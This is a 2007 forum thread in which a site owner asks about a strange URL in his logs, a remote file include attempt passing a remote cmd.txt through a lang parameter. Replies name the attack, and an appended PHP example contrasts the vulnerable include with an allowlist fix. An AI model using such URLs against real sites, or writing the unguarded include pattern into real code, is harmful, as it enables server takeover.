XSS (Cross Site Scripting) issue

Discussion in 'Security' started by komrad, Aug 15, 2007.

  1. #1
    Hello,

    Some days ago, I checked my site visitor statistics and I was really wondering because there were many strange URLs found.

    Here are some of them:

    http://www.mydomain.com/order.php?lang=http://rpgnet.com/newrpgnet/intranet/cmd.txt

    The part of the URL in bold didn't exist on the site.

    So, could you give me a solution to this problem? What should I do?
    Are they dangerous?

    I really need your help. Thanks in advance.
     
    komrad, Aug 15, 2007 IP
  2. CodyRo

    #2
    I suppose this forum makes a bit more sense than the Apache one.

    Check my post in the other forum.

    Linky
     
    CodyRo, Aug 16, 2007 IP
  3. Webmoney-Vl

    #3
    It refers not to XSS; it is PHP-inj. It is eliminated in the following way:

     
    Webmoney-Vl, Aug 16, 2007 IP
  4. BTS

    #4
    This is a remote file include.
    If you use a script, tell its owner to cancel the bug,
    like
    }else{
    echo " sorry , not found " ;
     
    BTS, Aug 21, 2007 IP
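
The remote file include discussed in this thread, shown as an added example that is not code from any poster or from the site in question: a hypothetical order.php that takes ?lang= and resolves it through an allowlist instead of passing it to include. The language codes, file names and directory layout are assumptions.

```php
<?php
// Added example: hypothetical order.php that picks a language file from ?lang=.
// File names and directory layout below are assumptions, not from the thread.

// Vulnerable pattern (do not use): the request value goes straight into
// include, so a URL in ?lang= can be fetched and executed as PHP when
// allow_url_include is enabled.
//   include $_GET['lang'];

// Hardened form: map short language codes to fixed local files.
const LANG_FILES = [
    'en' => 'lang/en.php',
    'de' => 'lang/de.php',
];

/**
 * Return the local file for a requested language code, or null when the
 * value is not on the allowlist (URLs, paths, arrays, unknown codes).
 */
function resolve_lang_file($requested): ?string
{
    if (!is_string($requested)) {
        return null; // ?lang[]=x arrives as an array, not a string
    }
    return LANG_FILES[$requested] ?? null;
}

$file = resolve_lang_file($_GET['lang'] ?? 'en');

if ($file !== null && is_file(__DIR__ . '/' . $file)) {
    // Only a path taken from LANG_FILES ever reaches include.
    include __DIR__ . '/' . $file;
} else {
    http_response_code(404);
    echo 'sorry, not found';
}
```

With this in place, a request such as the one in the first post gets the 404 branch because the value is not a key in the allowlist. Keeping allow_url_include set to Off in php.ini adds a second layer for any include the allowlist does not cover.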